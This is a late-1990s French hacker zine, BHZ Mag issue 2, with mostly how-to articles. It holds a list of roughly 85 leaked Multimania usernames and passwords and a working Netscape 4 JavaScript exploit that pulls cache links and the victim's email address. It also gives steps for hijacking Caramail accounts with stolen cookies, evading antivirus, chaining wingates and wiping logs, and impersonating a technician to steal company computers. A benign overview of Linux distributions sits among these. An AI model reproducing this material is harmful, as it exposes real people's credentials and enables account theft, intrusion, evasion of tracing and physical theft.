                                          ****             2222
    **                               **************                   22   22
   **|*********   **             ** *************                    22     22
   **  ***  ***         **  666          *              ___   22      22
   *|*         **  ***       **  666          *             /   )          22
    *|           *   **       ** **          **             !    )        22
    *|*          *   **      **            **         (___)       22
    *|12345678910   %%%%        ***              **            22
   **|* *******       ********       ***                 **         22
   **|*       ***    ** 666 *       **                    **        22
   $$|*         **   **    **      **                     **       22
   *|*          *   **    **     **                       **     22
   *|**        **   **     **    **                       **    222222222222
   */*  ********   ***     **   **
   $$$$$$$         BHZ     ***    !!!!!!!!!!!!!
   *              -----        ****   
  ****          ****            ****
             		The Belgian Hackers Zone !!!!!!!!!


Bienvenue dans la deuxieme edition de BHZ MAG!!!
J'espere que cette fois ci y'aura plus de lecteurs que la fois passee...
les articles sont plutot  differents de la fois passee (sauf 1 ou 2)
J'espere donc que Hoper et Seb R. vont etre contents cette fois...
si y'a des trucs que vous entravez dalleque mailez moi a asmodeus@mail.be
je rappelle que une fois de plus c moi AsmodeuS qui ai fait tous ces articles
et que une fois de plus ce pourri de Flat Eric n'a rien fait.A ce jour la
seule chose qu'il a fait pour le BHZ c'est fournir un nouveau logo plus
reussi que l'ancien(fait par moi)et ben oui je suis nul en graphisme...
Encore l'aut' jour il me dit "Je prefere pratiquer des nouvelles techniques
et connaitre des nouveaux trucs plutot que de me faire chier a ecrire des
putains d'articles..."Enfin meme si lui et moi on a une vision differente
des choses,une vision differente de l'UnderGrouNd,c quand meme un pote.


The Belgian Hackers Zone : www.bhz.be.tf  ou www.altern.org/bhz
Y a pas grand chose:les zines,un forum et quelques programmes "de base"
e-mail : asmodeus@mail.be : Asmodeus   Flat Eric : Flat_eric@moncourrier.com


SOMMAIRE :
----------
1:Contourner un Anti-Virus
--------------------------
2.:Hack de caramail version 2!
""""""""""""""""""""""""""""""
3.:Les differentes distributions de Linux
----_________-_-_-_======_________________
4.:Comment etre reellement intracable?(spoof)
*********************************************
5.:Les mots de passe des users de Multimania!

6..Le bug de securite de Netscape 4(suite)
++++++++++++++++++++++++++++++++++++++++++
(7)Comment upgrader facilement son ordi
 - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 /_8_\Les failles de securite(spoofing et ICMP)
``````````````````````````````````````````````
9*Les intrusions
````````````````
10.Liste de proxys
''''''''''''''''''
11 Virus en .bat

12.Lynux Myths (by Microsft)

1/*./Comment Contourner un antivirus??
-------------------------------------
Bon d'abors vous remarquerez que j'ai mis contourner et pas tuer ou autre chose
du genre.Je ne pense pas que ca marche pour tous mais bon.J'ai trouve ca une
fois par hasard quand je faisais des essais avec le CiH.Je sais que ca marche
avec V-Unvirus (sur la boite ils disaient qu'il detecte + de 32000 virus...)
C tout simple il faut creer un repertoire avec des espaces entre les lettres
ex : C:/V I R U S/ et mettre le virus dedans.L'antivirus scannera le repertoire
C:/V et ne trouvera donc aucun virus.Je sais bien que ca marche pas avec Panda
mais si ca va avec V-Unvirus,ca doit surement aller avec d'autres aussi...00


2.:Hack de Caramail(version 2)
""""""""""""""""""""""""""""""
(La version 1 etait dans BHZ Mag n1)
Bon deja je vous dis tout de suite qu'il faut que l'ordi sur lequel vous etes
aie un ou plusieurs cookie de caramail.Si c'est pas le cas il y aura un message
du genre "Erreur reception Cookie"(Ca arrive aussi quand votre navigateur
accepte pas les cookies)Alors vous tapez dans la barre d'adresse:
http://www14.caramail.com/scripts/contenu.exe?FOLDER=1 pour la boite de reception
http://www14.caramail.com/scripts/contenu.exe?FOLDER=2 pour les msg envoyes
http://www14.caramail.com/scripts/contenu.exe?FOLDER=3 pour les msg supprimes
Pour l'utiliser,piquez le cookie de quelqu'un ou alors allez sur un ordi de
votre ecole ou dans un cybercafe ou autre chose ou il y a plein de gens qui
passent.


3.:Presentation des differentes distributions de LiNuX
________________=========---------------_=--_-_-===---

La Debian 2.1 est la distribution preferee des utilisateurs avertis de Linux. Elle est
developpe et mise a jour de maniere completement benevole au sein du projet GNU
(Gnu's Not Unix). Elle privilegie avant tout la stabilit et la secrit du systeme.

C'est sans doute pour cette raison que la Debian n'utilise pas encore la version 2.2
du noyau mais la 2.0.36, ses promoteurs n'estimant pas le noyau 2.2 encore
suffisamment stable. Son installation qui s'effectue en mode texte est assez austere.
Toutefois les choix de configuration sont nombreux et varis. On peut par exemple,
choisir d'installer une machine serveur, de development ou pour surfer sur le Web.
Les differents paquetages de la Debian sont reput pour leur qualit. Ainsi
l'utilisateur est certain qu'un programme install de cette maniere sera
convenablement configur.

Comme pour le noyau, le serveur X Window (serveur generant une fenetre
rudimentaire mais qui peut etre amelior par une interface utilisateur graphique)
n'appartient pas a la plus recente des versions : le support des dernieres cartes
video fera par consequent defaut. Mais les utilisateurs de cette distribution sauront
ajouter eux memes les outils qu'ils desirent afin qu'elle puisse correspondre le mieux
 leurs besoins.

Helas, Debian n'etant pas une entreprise commerciale, elle ne propose pas de
support technique. Il faudra pour cela passer par une entreprise tierce ou bien
utiliser les nombreux forums de discussion du Web qui regorgent d'informations
utiles en cas de probleme.

 



                                RED HAT 6.0

La societe RedHat software n'est plus a presenter tant on a entendu parler d'elle
recemment. La version 6.0 de sa distribution represente une mise a jour majeure
fonde sur sur la version 2.2.5 du noyau de Linux. Son installation est toujours aussi
simple et rapide : elle s'effectue en une dizaine de minutes. On pourra malgres tout
lui reprocher le fait que le programme d'installation donne peu de choix de
configuration de la machine. Si l'on sait exactement ce que l'on veut, l'utilisateur
selectionnera l'installation personnalise qui permet de choisir les differents
paquetages. Sinon, il existe toujours la possibilit d'opter pour une installation par
defaut et rajouter par la suite les elements manquants.

Pour son installation, la Red Hat 6 utilise maintenant GNO RPM (Gnome Red Hat
Package Manager), qui remplace Glint (Graphical Linux Installation Tool), car ce
dernier ne propose pas d'interface graphique. L'interface par defaut de la RedHat
est desormais Gnome accompagn du gestionnaire de fenetres Window Manager
Enlightenment qui, s'il est tres plaisant virtuellement, n'en est pas moin assez lent et
gros consommateur de ressources. On lui preferera le tres joli et sobre Window
Maker ou le bon vieux FVWM95. Il est egalement possible d'utiliser KDE au lieu de
Gnome (pas conseill par moi car franchement Gnome + WindowsMaker c plus bo et
mieux que KDE...). Le choix se fait par l'intermediaire d'X Configurator, l'outil de
configuration du serveur X. Cette version de la RedHat inclue en standart le support
pour les machines SMP (Symetric Multi Processing) et les diques Raid (nan pas raid
le tueur de moustique !! mais Redundant Array of Inexpensive Disks), dans l'optique
de le deployer sur de gros serveurs. La version commerciale est livre avec deux
manuels tres complet et un support de 90 jours par messagerie electronique ou
telecopie.

 



                               MANDRAKE 6.0(c celle que j'utilise)

La distribution Mandrake 6.0 s'appuie en fait sur la Red Hat 6.0. Elle a ete
developpee a l'origine par un etudiant francais, Gael Duval, qui a eu l'idee d'ajouter
 la RedHat un environnement graphique simple d'utilisation (mais moins bo que
Gnome+WindowMaker) : KDE.La Mandrake est ainsi devenue, en seulement quelques
mois, incontournable dans le paysage des distributions Linux. Cela tient
principalement au fait qu'elle est resolument tourne vers une simplicit
d'installation et d'utilisation.

Pour faire face a un tel succes, la societe Mandrake Soft a ete creee afin de
commercialiser la distribution. Pour se differenceier de la Red Hat 6.0, qui inclue
aussi l'environnement KDE que Gnome, la Mandrake 6.0 apporte un ensemble de
petits avantages. Ainsi la procedure d'installation de la distribution est disponible
dans de nombreuses langues (vingt et une au total).

Mais les grandes differences se situent dans les versions des paquetages installs. Le
noyau est une version 2.2.9 contre 2.2.5 pour la Red Hat 6.0, une librairie Glibc
2.1.1 contre 2.1 pour Red Hat, une version de Gnome plus recente, etc En plus,
Mandrake 6.0 inclue une version 1.1.1 de KDE specialement optimise par Mandrake
Soft.

Pour le reste, elle offre exactement les memes fonctionnalits que la Red Hat 6.0
(support des technologies SMP, Raid, etc) La version commerciale, Mandrake
Power Pack, propose notamment sur 5 CD plus de 1800 paquetages RPM et 34
applications commerciales en version de demonstration. En outre, elle possede un
guide d'installation et d'utilisation en Francais, ainsi que 100 jours d'assistance
technique  l'installation.

 



                              OPEN LINUX 2.2

Open Linux de Caldera est la seule distribution qui dispose d'un programme
d'installation completement graphique : Lizard (Linux Wizard). Elle inclut meme une
version speciale de Partition Magic de Power Quest, afin d'aider l'utilisateur a
creer une partition Linux sans perdre ses partitions DOS. L'utilitaire Boot Magic
peut remplacer l'habituel Lilo (Linux Loader) afib de pouvoir choisir le systeme
d'exploitation sur lequel demarrer, et sa configuration est beaucoup plus aise que
celle de Lilo. L'administration des paquetages se fait avec K Package, l'equivalent de
GNO RPM mais reserv  KDE, ce dernier etant l'environnement par defaut de la
distribution. Open Linux utilise la version 2.2.5 du noyau et est livre en standart
avec Wordperfect 8.0 et de StarOffice 5.

L'un des points forts de cette distribution est sa possibilit d'integration dans ses
environements Netware, meme au sein d'un annuaire NDS (Novell Directory
Services). La version commerciale inclut un manuel d'installation (en anglais) et
offre un support  l'installation pendant 90 jours via le site Web de Caldera.

 



                              SLACKWARE 4.0

La Slackware est directement derive de SLS, qui etait l'une voire la toute
premiere distribution de Linux. Il ne s'agit pas du tout d'un entreprise commerciale
mais, comme dans le cas de la Debian, d'une affaire de banevoles. Les mises a jours
ne sont donc pas frequentes.

Cependant, avec l'annonce de la version 4.0, la Slackware se met au gout du jour.
Cette evolution ravira certainement les nombreux aficionados de cette distribution
qui sont souvent des adeptes de Linux de la premiere heure. 

Au niveau des paquetages, la Slackware fait dans la simplicit puisqu'il s'agit juse
d'une compression au format TGZ. Cette version 4.0 devrait inclure un noyau 2.2, la
derniere version du serveur graphique X Free ainsi que les environnements Gnome et
KDE.

 



                                  SUSE 6.1

La distribution SUSE est d'origine allemande. Etant disponible dans de nombreuses
langues, elle a rapidement eu une grande popularit, particulierement en europe. La
derniere version, la 6.1, integre le noyau 2.2.5 de linux. Le programme d'installation
est particulierement bien fait et traduit en francais. Il s'agit la aussi d'une
distribution fonde sur des paquetages RPM.

A noter toutefois que certains paquetages prevus pour le Red Hat ne seront paas
toujours compatibles avec la Suse. Au niveau graphique, elle integre le serveur X
Free 3.3.3.1 et les environnements Gnome 1.0 et KDE 1.1, ce dernier etant lui aussi
d'origine allemande.

Cette distribution est livre sur 5 CD qui regorgent de programmes de toutes
sortes, un peu comme dans le cas du Power Pack de la Mandrake. On y trouve, par
exemple, Wordperfect 8 Personal Edition, les versions de demonstration d'Adabas D
(un SGBDR), d'Applixware 4.4.1 (une suite logicielle), d'Arcad (un logiciel de CAO)
et d'Arkeia (une solution de sauvegarde). La version officielle de suse 6.1 offre un
support de 60 jours.

 
4.:;.,Commen etre reellemnt intracable?(Spoof)
**********************************************
-1 envoyer un email vraiment anonyme:
++++++++++++++++++++++++++++++++++++++
Les softs debile du genre anonimail ne cachent pas votre IP au serveur
donc il faut utiliser un FireWall (@tguard est le meilleur)et aussi
si possible un brouilleur d'IP(IP Jammer)c'est un programme qui est sense
brouille tout ce qui sort de votre modem mais ca marche pas toujours et 
parfois ca fait planter la connexion.Ensuite il faut recuperer le plus grand
nompbre d'adresses de serveurs mails.Je pense qu'il y en a pas mal sur
Anonymiser.com et celui-ci vous permet d'envoyer des mails en passant par
30 serveurs...Cela peut paraitre beaucoup mais bon...
Maintenant il existe des traceurs d'IP qui donnerait aussi le nO de tel!
Mais pour contourner cela je suppose qu'il suffit d'utiliser un proxy ou
un FireWall.

-2 le SpOoFing
+++++++++++++++
1-iDENT spoofing (Tres lame..dumoins ce n'est pas du vrai spoofing)
2-Wingate spoofing , proxy spoofing , shell spoofing (50%)
3-Le BLiND (100% mais une seul direction)
4-BiND spoofing (le vrai, le seul, l'unique spoof a 2 directions)

1- iDENT spoofing
	...wow...le spoofing pour win 95 haha super..je me connecte
	sur irc avec un programme qui modifie mon ident...hum mais 
	mon dns reste le meme..que faire? Bon...heheh ceci est considere
	comme du spoofing..mais en fait..ce n'est que l'adresse qui est
	modifie..quand on se connecte sur le serveur le programme envoie
	une chaine de caracteres qui fourvoie le serveur et qui vous permet
	d'impressioner les petites filles dans le channel 13 and et moins..
	avec une adresse bidon comme (nick)@ha.je.taime.anne11
	En fait vous restez vulnerable aux attaques des DoS(Denial of
	Services) ou NUKES...des floods..ect...une seule bonne application
	des idents spoofs c'est que vous pouvez spoofer un op qui est sur un
	bot et si vous aviez son pass alors..eehhehe vous pourriez avoir le
	controle du bot pour faire une takeover hahahahahaha...ok redevenons
	serieux..faire ca c'est lame... mais bon..heheheh ceux qui veulent le 
  	faire faite le.:).

2- WiNGATE ,PROXY,SHELL
	Bon..ici on ne peux parler de grosses techniques..mais plutot de
	sysadmin pas vailliant qui nous aident.Ici je parle des wingates qui
	nous permettent de spoofer l'adresse du wingate connecte,des proxy
	et des shells qui font la meme chose. En fait on rencontre souvent
	des gens qui vont sur irc, qui wingatent..ou qui run un shell UNiX pour 
	pouvoir nuker...c'est tres bien mais moi l'application des wingates,
	proxy et des shells que je trouve la plus pratique c'est que nous
	pouvons pratiquement spoofer notre presence quand nous hackons un
	serveur.Je veux dire que par la combinaison suivante qui m'a
	ete donner par un Conseillier senior d'un service internet
	quelconques nous pouvons etre intracable..:
	Notre ordi==>wingate==>wingate==>Shell==>wingate==>CiBLE
	Bon il faut s'entendre intracable par traceroute et..quelques
	autres commandes..bien sur si vous hackez un serveur du pentagone..:)
	heheh ils ont des chances de vous retrouver..environ 50% car..les
	wingates sont en fait des bugs...mais certains administrteur ne se
	souciant pas de la perte de bandwith de leur reseau les laissent
	ouverts...mais log les connections :) alors...si on vous log..et si
	par chance pour l'intelligence qui vous pourchasse tout les wingates
	etaient logges...alors bonne chance :). Bon..il faut  aussi mentionner
	que si vous hackez par l'intermediaire d'un shell il est bon de
	savoir comment effacer les logs...bien sur il y a plein d'exploits
	pour ca....utmpclean,zap,marry.....voir:www.rootshell.com.
	En fait la solution est de bien couvrir ses traces..:)
	Ha une autre chose a propos des wingates...certains wingates son
	ouverts seulement pour  vous attirer vers eux puis ensuite logger
	toutes vos actions alors attention...
	
Pour trouver les wingates..utilisez un wingate scanner...
Proxy = meme chose
Shells = achetez en un...ou Hackez en un :)



3- Le BLiND SPOOFiNG...
	Bon...je ne m'etendrai pas vraiment la dessus...le blind
	spoofing est surtout utilise pour les DoS ...Nukes.. il 
	permet de spoofer l'adresse d'un packet.L'inconvenient	
	c'est que le packet reste tracable sur le reseau de routers 
	utiliser pour lancer l'attaque.Alors le packet est tracable..
	et vu que les routers sont logges..alors :) hehehe on peut vous
	retracer si le besoin s'en fait ressentir en fait le blind spoofing
	repose sur le principe que le packet se dirige dans une seule direction
        Alors on ne peut voir le resultat....du point de vue du
	packet envoye...exemple:
	J'envoie un packet spoofe a 170.90.90.90 provenant de l'adresse
	120.3.2.1 ...je n'ai plus de controle sur 120.3.2.1 .
	N'oublier pas que ma vrai adresse n'est pas 120.3.2.1 mais 
	que si on trace 120.3.2.1 et notre adresse on retrouvera qu'il
	proviennent des meme routers que notre ip et si on regarde dans les logs
	des routers...on retrouvera le ip de provenance..
	Le blind spoofing est donc souvent utilise dans les nukes...car 
	nous n'avons pas besoin de recevoir un packet..pour confirmer qqch.

Encore une fois ces attaques peuvent etre loguees ou tracees mais un packet 
provenant d'un blind spoof a une duree de vie egale a celle des logs que
les routers gardent...alors si vous voulez savoir combien de temps votre
securitee peux etre compromise...hum appelez votre ISP et demandez lui
combien de temps les routers gardent les logs ;) je ne sais pas pourkoi mais
ils ont refuse de me le dire hehehehe.
	

	
4- Le BiND SPOOFiNG

	Hum..bon...voici le summum de la protection....que nous pouvons avoir
	en fait si on est capable de reunir toutes les composantes nesessaires.
	Premierement savoir :
	Qu'est-ce qu'un Domain-name-server,Name server ou NS:
	J'utilise la compagnie internet total.net
	Pour me donner un nom en fait une addresse ip le serveur a recours 
	a un Name server qui m'a attribue une addresse ip ..vous avez
	deviner un Name server c'est ce qui donne les ip..et la resolution
	en nom comme www.yaho.com = 204.71.200.74  toutes ses conversions 
	en lettres sont effectuees par eux...alors imaginez le reste
	si vous pouviez avoir l'acces root sur un NS :)!
	Exactement..vous dever avoir..root sur un NS pour vraiment spoofer
	pouvoir changer votre dns....alors.les mythes entourant le spoof sont
	grandement resolus.. 

Et apres le root....comment fait t'on...:) utilisez un programme comme jizz
ou any-erec des BiND spoofers
Bien sur je recommande de faire cela avant de se rooter sur un NS
Notre ordi==>wingate==>shell==>wingate==>NS 
dumoins si vous voulez ne pas etre logge
Et comment trouver les Nameservers...? Bien en Windows 95 ..je ne sais pas
mais en Linux ou Unix....la commande Nslookup est tres utile..!
EX:
	Nslookup -type=any www.yahoo.com
	non-authorative nameserver...on oublie ca....!

	authorarive nameserver
	ns.yahoo.com 	= 204.71.177.33
	ect....

alors ce sont les nameservers :)
mais attention les nameserveurs sont souvent les colones vertebrales des
reseaux alors attention de ne pas les mettre down!...
En clair c comme une adresse de redirection donc...	

-3 Firewall materiel:
Le firewall materiel quand a lui,est un pc relie au poste de travail par un
bete reseau.Le filtre ici c'est le pc qui s'interpose entre le poste de travail
et le reseau.C'est une bonne maniere de recycler un vieux 486 avec quelques Mo
de RAM

5.:Les mots de passe des users de Multimania

Je vous rappelle que cest mots de passe ont ts publis sur le web et aussi
dans Pirates Mag je pense.De toute facon ils on tous ete changes par MulTiManIa
et les users ne peuvent pas reprendre leur ancien mot de passe.Mais c'est quand 
meme interessant de voir ca...

id/pass:ffq/cyberboz
id/pass:sandrinedalle/marion
id/pass:rainbow66/rainbow
id/pass:vol1/c&4rt&
id/pass:hemery/airone
id/pass:ajtfort/5mat11
id/pass:capucinem/ckyone
id/pass:amcweb/leo000
id/pass:fmarolles/fredo1
id/pass:pow/taitai
id/pass:jolko/maxime
id/pass:what01/ines007
id/pass:jchesteau/taillis53
id/pass:biergarten/daniel
id/pass:mvampouille/acetoi
id/pass:jmmdan/jmdcied
id/pass:carolinepepion/220783
id/pass:ophidie/manson
id/pass:thro/tt6835
id/pass:tiz/xavier
id/pass:landreville/monkey2
id/pass:piquery/tomate
id/pass:pmalo/poupete!
id/pass:chje/elsarener
id/pass:smidge/duke3d
id/pass:cezotronic/dragon
id/pass:codepbad31/del.buv.31
id/pass:impelang/brout456
id/pass:guigui200/clairehera
id/pass:arnaudgris/remiweb
id/pass:splif/hchich
id/pass:chezbaf/sandsand
id/pass:clainchardmarie/sylvain
id/pass:lambertl/mamour
id/pass:vstern/vst1979
id/pass:thunderde/23dethu
id/pass:llthomas1/166444
id/pass:gigla/multimaniakata
id/pass:sgelbart/chicoune
id/pass:xgaiax/VEGAN4LIFE
id/pass:grandfond/gag0810
id/pass:acigneaufeminin/paris1
id/pass:shacid/paix1037
id/pass:naturotop/bioman
id/pass:badboy1/badboy]@[
id/pass:geolalp/chartreu
id/pass:lauraider/thibault
id/pass:tiandao/mokkori
id/pass:ebk/blackice
id/pass:barrail/150360
id/pass:calasdidier/ladoux
id/pass:sashpg/pierre98
id/pass:michelhoffmann/171094
id/pass:catseyes1/Roxette
id/pass:benett/benett1
id/pass:mmarchali/220552
id/pass:orchestre/drbouka
id/pass:bertoune/151277
id/pass:guanakey/wazzup
id/pass:bclement/160680
id/pass:piccand/piou6237
id/pass:sunfire/lait55
id/pass:sycho/westgate
id/pass:mpapillon/aurelien
id/pass:ageofempire/dentdent
id/pass:depechepop/terandar
id/pass:foggier/040354
id/pass:htmld/iieiie
id/pass:taaren/quanah
id/pass:suinat/yobabyyo
id/pass:francoisgilbert/exposed
id/pass:sebastienolive/olive97
id/pass:diksa/eskive
id/pass:david09/delestre09
id/pass:cinemania/carna17
id/pass:abouyassine/test102
id/pass:prambaud/NGw780
id/pass:frenchtouch/connextion
id/pass:frencko/cel300a
id/pass:burkinaction/012485
id/pass:kadams/kadams
id/pass:ogma/youga1
id/pass:karim92/mirak23
id/pass:observatoire/hesse3
id/pass:crumble/krulll

et ca c'est la lettre que tous les utilisateurs de MuLtiManIa ont recu:

Paris le 23/06/1999 

Cher(e) Membre

Nous nous sommes rcemment aperu que MultiMania offrait certaines failles de scurit.
Ces failles, bien que mineures, auraient pu permettre des intrusions dans la base MultiMania 
et ont t immdiatement colmates.

Cependant, par mesure de scurit nous avons dcid de modifier les mots de passe de l'ensemble
des membres de MultiMania pour assurer  chacun une totale scurit sur son compte.

Le nouveau mot de passe qui vous a t attribu, a t envoy  l'adresse e-mail que vous 
aviez saisie sur MultiMania.

Si vous n'avez pas reu ce mot de passe, un formulaire est  votre disposition pour le rcuprer.

Si vous rencontrez un problme, vous pouvez nous crire en passant par le formulaire prvu  cet effet.

Vous pouvez modifier ce mot de passe  votre guise, mais vous ne pourrez pas rutiliser exactement
le mme mot de passe que celui que vous aviez prcdemment.
Pour modifier votre mot de passe, connectez vous a l'Espace Membre accessible  partir de http://www.multimania.fr.

Paralllement, pour vous assurer une fiabilit maximum lors de vos connexions  MultiMania,
nous avons mis en place un systme scuris de transmission des donnes (SSL). 
Ce systme, qui se matrialise par l'apparition d'un petit cadenas au bas de votre navigateur, 
vous assure une confidentialit totale lors de la transmission de vos donnes.
Il est maintenant prsent sur l'ensemble des pages de MultiMania o vous enregistrez des 
donnes (pages d'identification, Espace Membre, procdure d'abonnement).

Cette procdure nous a paru tre la plus efficace pour vous garantir une utilisation optimale
et sre de MultiMania.

Cordialement,

L'quipe de MultiMania 

-------

6..Le bug de securite de Netscape 4(suite)
++++++++++++++++++++++++++++++++++++++++++
Dans BHZ mag nO 1 j'expliquais comment le bug fonctionnait.Mais j'ai recu des mails
de personnes qui disaient vouloir le script ou qui disaient que l'article etait
pas complet...
Le voici:

<SCRIPT>

a=window.open('wysiwyg://1/about:cache');
s='Voici quelques liens contenus dans votre cache: \n';
for(i=0;i<7;i++)

 s += a.document.links[i] + '\n'; 
a.close();
alert(s);


a=window.open('wysiwyg://1/about:config');


mag='mail.identity.useremail = ';

mend='general.title_tips';

res=mag;

charstoread=20;


alert('Il est possible de trouver votre adresse email. Ca peut prendre un certain temps.');

function readit() {
for(i=0;i<charstoread;i++) {
 t=res;

 a.find(mend);
 for(c=1;c<256;c++) {
   t=res + String.fromCharCode(c);

     if (a.find(t,true,true)) {
/*      alert(c); */
      res=t;

     } 
 }
}
res=res.substring(mag.length);

a.close();
alert("L'adresse email est :\n" + res);
}

setTimeout("readit()",3000);
</SCRIPT>
 _
(7)Comment upgrader facilement son ordi(et/ou se faire des thunes facilement)
 -  -----------------------------------------

Bon alors pour commencer il faut 1-ne pas etre con
				 2-avoir un certain age...

Alors voila la methode:Munissez vous d'un bleu de travail ou de vetements
qui conviendraient pour un informaticien et inventez vous un nom,et meme
si vous trouvez ca necessaire faites vous une carte de visite...
Trouvez vous une 'tite entre prise ou une 'tite societe et allez y puis
baratinez les en disant que quelqu'un a demande que vous fassiez la revision
complete de leurs ordis ou mieux un test de compatibilite an 2000...
Pour faire plus vrai amenez vous avec une valise avec tournevis,CD's,pinces
et faites d'abord ler test software puis a vos tournevis...Demontez la tour
et hop a vous tout le materiel PC que vous voulez...Vous pouvez soit leur dire
que y'a un probleme avec leur matos et que vous ramenez ca chez vous pis que 
vous reviendrez demain (dites leur de vous appeler(le n sur la fausse carte
de visite)si y'a un probleme)N'hesitez pas a prendre tout ce qu'il vous faut...
Meme les ecrans!J'ai vu que dans certaines banques et dans certaines societes
ils payent des putains d'ecrans plats a leurs employes!(mais evitez les banques
...trop de cameras..)Evidemment il faut pas commencer a se marrer quand vous
leur piquez des trucs...ne fois al'abri faites l'inventaire de ce que vous avez
...si y'a des trucs dont vous avez pas besoin allez chez des magasins comme
Electro Ca$h (ils payent cash...)L'avantage de ce genre de magasins c'est qu'ils
posent pas de questions...Mais il se peut que cela soit un meilleur prix ailleur
mais personnellement je prefere pas prendre de risques...et si vous avez l'impression
apres avoir fait ca plein de fois qu'ils vous connaissent bien,soit changez de
magasin ou revendez ca a des copains ou a des cons....
Cela peut aussi servir pour l'espionnage industriel mais bon...
Les trucs a dire si on vous dit qu'ils on pas demande d'informaticiens:
-"Ah bon c'est pas ici ..(le nom de la boite en changeant un peu)...?"
-Vous telephonez quelques jours avant en essayant de trouver le nom du patron
pis vous dites "Mais pourtant c'est Mr.Patron lui-meme qui m'a dit de venir!"
 ___
/_8_\Les failles de securite(spoofing et ICMP)
``````````````````````````````````````````````

La faille de securite la plus connu est celle qui utilise l'IP spoofing.
On se fait passer pour une machine du reseau externe pour penetrer dans le
reseau intranet. Il s'agit de donner, en general un IP connu par la
machine attaquee, et donc on peut avoir un acces a cette machine etant
reconnue comme machine "amie". Ca permet par exemple, de pouvoir envoyer
des daemons a la machine a hacker en passant par differents filtres (comme
TCP Wrapper), parce qu'on s'est fait indentifier comme etant une machine
"amie".
Explications sur ce qu'est un daemon: on va faire un schema rapide:
un daemon est un programme qui lance des applications en arriere plan de
ce que vous faites sous Linux/UNIX. Bref creez vos propres daemons genre:
des qu'on tape le mot: "je", y'a un fichier qui s'efface dans le repertoire
que vous aurez choisi... Bref ca represente un grand trou de securite...
Mais j'en vois p'tetre qui n'aurait pas tout compris. Bon je resume, parce
qu'on est pas oblige d'avoir Linux/UNIX pour avoir des competeces sur ces
systemes.
En se faisant identifier comme la machine "amie" aupres de la machine
ciblee, on peut passer a travers des filtres de type TCP Wrapper (qui n'est
qu'un exemple parce que j'ai un schema du fonctionnement, y'en a d'autres
bien sur), et envoyer des daemons a la machine ciblee ou exploiter des
programmes de communication. Pour schematiser ce type d'attaque voici un
exemple de filtre de type TCP Wrappper: 
   monhost a l'@IP: 144.135.10.1 
   monhost/ :cat /etc/hosts.allow 
   fingerd: ALL : (mail -s finger-from-%h admin@monhost.mon-domaine.fr) 
   ALL : LOCAL 
   ALL : mon-domaine.fr 
   ALL : 114.135.10 
Ainsi monhost autorise l'acces a tous ses daemons a toute machine dont
l'adresse IP commence par 144.135.10. En ayant tous les droits sur ce genre
de machines (dans l'exemple 144.135.10.1) vous pouvez envoyer des daemons, ou
bien exploiter les programmes de communications de la becane ciblee. Pour
faire croire au filtreur que vous etes ami, faut lui faire croire que vous
venez du reseau interne, et bien sur la machine que vous aurez a cibler est
144.135.10.1 (je l'ai deja dit plus haut). 

   Bon ca c'etait pour les filtreurs et le spoofing ainsi qu'une entrevue sur
les daemons. Car des failles de securite y'en a d'autres. C'est le
detournements de paquets IP, (Internet Control Message Protocol redirects).
Ce qu'il faut savoir c'est que les paquets redirection ICMP servent a un
routeur par defaut a indiquer l'IP d'un nouveau routeur par defaut. Ce type
d'attaque de redirection ICMP, permet le dtournement des paquets ethernets,
vers un autre routeur par defaut causant ainsi la perte du paquet envoye, et
la station attaquee ne peut plus emettre ailleurs. La trame ICMP peut etre
encapsulee, dans une trame IP (juste l'adresse IP de la cible est marquee),
et donc l'attaquant peut venir du reseau externe, meme si l'emetteur est du
reseau interne. La station recevant la trame ICMP doit verifier qu'elle vient
bien de son routeur par defaut , ainsi vous devez utiliser le spoof pour vous
faire passer pour le routeur par defaut, et recevoir la trame ICMP, la station
etant en contact avec le routeur par defaut en temps normal. 

   En sachant que pour joindre un reseau local, les paquets IP  doivent passer
par un routeur qui joint le reseau externe au reseau interne (il n'y en a pas
qu'un), il suffit de prendre possession de ce routeur et d'indiquer aux autre
routeurs que la distance entre eux et le votre est la plus petite. Ainsi pour
faciliter la rapidite du transfert de donnees ils vont faire passer les
paquets par vous.

9*les Intrusions
////////////////


 Bon, vous connaissez tout, ou a peu pres tout, sur les manieres basiques de
 penetrer un systeme...
 On va les re-enumerer, car il y en a de nombreuses que l'on oublie. Pour
 faire jouer la securite d'un reseau il s'agit de connaitre toutes ces
 methodes: si vous n'en connaissez qu'un tiers ou un quart, vous n'irez pas
 tres loin (c'est chiant a dire mais c'est vrai).

 Attaque par virus, vers, bombes logicielles
 Intrusion par Trojan horse(ou Cheval de Troie)
 Intrusion par backdoors: le createur d'un programme, cree une faille
 qu'il est sur d'etre le seul a exploiter.
 Intrusion par spoofings de packets (on peut voir a dans hacking d'un
 routeur en images), quand on usurpe une adresse IP qui est reconnue comme
 faisant partie du reseau, ou par d'autres methodes de spoofings, cf article:
 "spoofing"
 Espionnage de liaisons ou analyses de trafic: detournement de trames qui
 circulent sur le reseau, avec a on peut intercepter des mots de passe
 Intrusions par les bugs des logiciels
 Exploitation d'acces non securises: quand on demande un mot de passe style
 1234, on quand on n'en demande pas!
 refus d'acces, saturation de services (DENI de services), en general quand
 on empeche l'acces a une ressource par flooding (!), ou bien parce que les
 pass ont changes (Cf: hack d'un routeur)
 Transparence excessive des annuaires: on ne vous cache rien, c'est quand
 vous faites des infos requests d'un domaine sur NetworkSolutions, pour
 choper les infos des dirigeants d'une entreprise, ou bien par l'annuaire:
 plus simple.
 Surveillance des messageries d'entreprises
    Quand on ouvre son reseau d'entreprise sur l'internet, les admins ("vive
 eux" hehem!!), des reseaux ne se genent pas de tout securiser (remarquez qu'ils
 sont la pour a). Donc sur un reseau intranet d'entreprise, il y a un poste avec
 un modem qui a un  firewall ET anti-virus active en permanence 
  (dans quel monde vit-on), et des parametrages de securite:
 - Pas d'utilisation de type libre (on peut pas faire ce qu'on veut)
 - On ne peut pas maitriser la securite (impossible de desactiver
 l'anti-virus par exemple)
    Et pour rejoindre ce poste au reseau internet les trames passent par un
 RTC( Reseau Telephonique Commute) ou un RNIS (Reseau Numerique a Integration
 de Services), ou encore un RFI (reseau a fibre optique) puis par un modem
 relie a l'ISP puis a internet voire passant par un proxy.
    Une autre solution de securite pour proteger le LAN prive ( reseau interne)
 ,consiste a mettre un routeur filtrant entre le LAN et  l'ISP... celui-ci fait
  un filtrage sur les champs des protocoles de  communacation (style UDP, IP, TCP...).
 C'est en general la solution choisie  par de nombreux administrateurs. 
 Mais a leur demande une bonne connaissance
 des protocoles. Ainsi il y a 3 caracteristiques a ces routeurs:
 - Connaissance des protocoles exigee
 - Pas de logs/statistiques d'exploitables
